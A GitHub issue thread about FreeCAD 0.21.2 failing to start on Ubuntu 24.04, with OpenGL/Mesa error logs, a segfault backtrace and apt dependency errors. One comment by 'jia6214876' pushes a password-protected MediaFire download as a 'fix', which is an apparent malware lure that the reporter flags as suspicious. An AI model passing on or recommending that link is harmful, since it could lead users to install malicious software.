FreeCAD/FreeCAD #16082: Freecad 0.21.2 does not work

leoheck, 2024-08-27:
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Problem description

Freecad 0.21.2 launches but it is not usable. I cannot create a new file/project. 

I also have the 0.22-dev AppImages too, so the `~/.local/share/FreeCAD` was removed to make sure it was not an issue.

When launching from the command line, this is what it is complaining.. .

```bash
~/Applications …
➜ ./FreeCAD-0.21.2-Linux-x86_64_41d545329e0f040cf5f08885bf4ba84b.AppImage
FreeCAD 0.21.2, Libs: 0.21.2R33771 (Git)
© Juergen Riegel, Werner Mayer, Yorik van Havre and others 2001-2023
FreeCAD is free and open-source software licensed under the terms of LGPL2+ license.
FreeCAD wouldn't be possible without FreeCAD community.
  #####                 ####  ###   ####  
  #                    #      # #   #   # 
  #     ##  #### ####  #     #   #  #   # 
  ####  # # #  # #  #  #     #####  #   # 
  #     #   #### ####  #    #     # #   # 
  #     #   #    #     #    #     # #   #  ##  ##  ##
  #     #   #### ####   ### #     # ####   ##  ##  ##

MESA-LOADER: failed to open iris: /usr/lib/dri/iris_dri.so: cannot open shared object file: No such file or directory (search paths /usr/lib/x86_64-linux-gnu/dri:\$${ORIGIN}/dri:/usr/lib/dri, suffix _dri)
failed to load driver: iris
MESA-LOADER: failed to open iris: /usr/lib/dri/iris_dri.so: cannot open shared object file: No such file or directory (search paths /usr/lib/x86_64-linux-gnu/dri:\$${ORIGIN}/dri:/usr/lib/dri, suffix _dri)
failed to load driver: iris
MESA-LOADER: failed to open swrast: /usr/lib/dri/swrast_dri.so: cannot open shared object file: No such file or directory (search paths /usr/lib/x86_64-linux-gnu/dri:\$${ORIGIN}/dri:/usr/lib/dri, suffix _dri)
QOpenGLWidget: Failed to create context
QOpenGLWidget: Failed to create context
QOpenGLWidget: Failed to create context
No valid GL context found!
(qt.qpa.backingstore) composeAndFlush: QOpenGLContext creation failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
No valid GL context found!
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
(qt.qpa.backingstore) composeAndFlush: makeCurrent() failed
```

### Full version info

```shell
OS: Ubuntu 24.04.1 LTS (ubuntu:GNOME/ubuntu-xorg)
Word size of FreeCAD: 64-bit
Version: 0.21.2.33771 (Git) AppImage
Build type: Release
Branch: (HEAD detached at 0.21.2)
Hash: b9bfa5c5507506e4515816414cd27f4851d00489
Python 3.10.13, Qt 5.15.8, Coin 4.0.0, Vtk 9.2.6, OCC 7.6.3
Locale: English/United States (en_US)
```

### Subproject(s) affected?

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

leoheck, 2024-08-27:
I also found these 2 issues.
https://github.com/FreeCAD/FreeCAD/issues/13129
https://github.com/FreeCAD/FreeCAD/issues/15016

My NVIDIA drivers were not updated. 
I rebooted my system just in case.. nothing has improved.

Closing this Freecad version that does not work, gives me this:

``` bash
Program received signal SIGSEGV, Segmentation fault.
#0  /lib/x86_64-linux-gnu/libc.so.6(+0x45320) [0x77c7cde45320]
#1  /lib/x86_64-linux-gnu/libc.so.6(+0x19d0a5) [0x77c7cdf9d0a5]
#2  /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/./libCoin.so.80(cc_glglue_instance+0x168) [0x77c7cd84b418]
#3  0x77c7d1069e62 in SIM::Coin3D::Quarter::QuarterWidgetP::removeFromCacheContext(QuarterWidgetP_cachecontext*, QOpenGLWidget const*) from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0xb2
#4  0x77c7d1069efa in SIM::Coin3D::Quarter::QuarterWidgetP::~QuarterWidgetP() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0x1a
#5  0x77c7d1069999 in SIM::Coin3D::Quarter::QuarterWidget::~QuarterWidget() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0xb9
#6  0x77c7d10a2fca in Gui::View3DInventorViewer::~View3DInventorViewer() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0xa
#7  0x77c7d1092886 in Gui::View3DInventor::~View3DInventor() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0x106
#8  0x77c7d109290a in Gui::View3DInventor::~View3DInventor() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0xa
#9  0x77c7ce4ddf70 in QObject::event(QEvent*) from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libQt5Core.so.5+0x40
#10  0x77c7cf37035e in QApplicationPrivate::notify_helper(QObject*, QEvent*) from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libQt5Widgets.so.5+0x7e
#11  0x77c7d0cf7129 in Gui::GUIApplication::notify(QObject*, QEvent*) from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0x99
#12  0x77c7ce4b3fc8 in QCoreApplication::notifyInternal2(QObject*, QEvent*) from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libQt5Core.so.5+0x108
#13  0x77c7ce4b6c91 in QCoreApplicationPrivate::sendPostedEvents(QObject*, int, QThreadData*) from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libQt5Core.so.5+0x181
#14  0x77c7ce4ba6bc in QCoreApplication::exec() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libQt5Core.so.5+0x9c
#15  0x77c7d0c5bddc in Gui::Application::runApplication() from /tmp/.mount_FreeCAuLigqy/usr/bin/../lib/libFreeCADGui.so+0x1ecc
#16  /tmp/.mount_FreeCAuLigqy/usr/bin/freecad(+0x7620) [0x5a74f2c0a620]
#17  /lib/x86_64-linux-gnu/libc.so.6(+0x2a1ca) [0x77c7cde2a1ca]
#18  /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0x8b) [0x77c7cde2a28b]
#19  /tmp/.mount_FreeCAuLigqy/usr/bin/freecad(+0x7981) [0x5a74f2c0a981]
```

leoheck, 2024-08-27:
Adidng the freecad-stable PPA, to install it from the apt package manager. Gives me this issue which may be related.

```bash
➜ sudo apt install freecad
[sudo] password for lheck: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
 libocct-visualization-7.6t64 : Depends: occt-misc (= 7.6.3+dfsg1-7.1build1) but 1:7.6.3+dfsg1-8~ubuntu24.04.1 is to be installed
E: Unable to correct problems, you have held broken packages.
```

leoheck, 2024-08-27:
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Sorry,  but this "file" is kind of strange. How can I find this issue you mentioned so I can check the solution myself there?

leoheck, 2024-08-27:
Can somone remove `jia6214876` comments? I believe this is `file` he is sharing is not a good thing.

leoheck, 2024-08-27:
@luzpaz there is another one, of the same kind here https://github.com/FreeCAD/FreeCAD/issues/16082#issuecomment-2311443636

leoheck, 2024-08-27:
Tried it using X11 and also Wayland. Both with NVIDIA 535 and Nouveau but nothing seems to change anything.

maxwxyz, 2024-08-27:
0.22 works?

leoheck, 2024-08-27:
yes

maxwxyz, 2024-08-27:
I'm closing this then as 1.0 is soon to be released and there won't be any backports to 21.2

closed 2024-08-27 by maxwxyz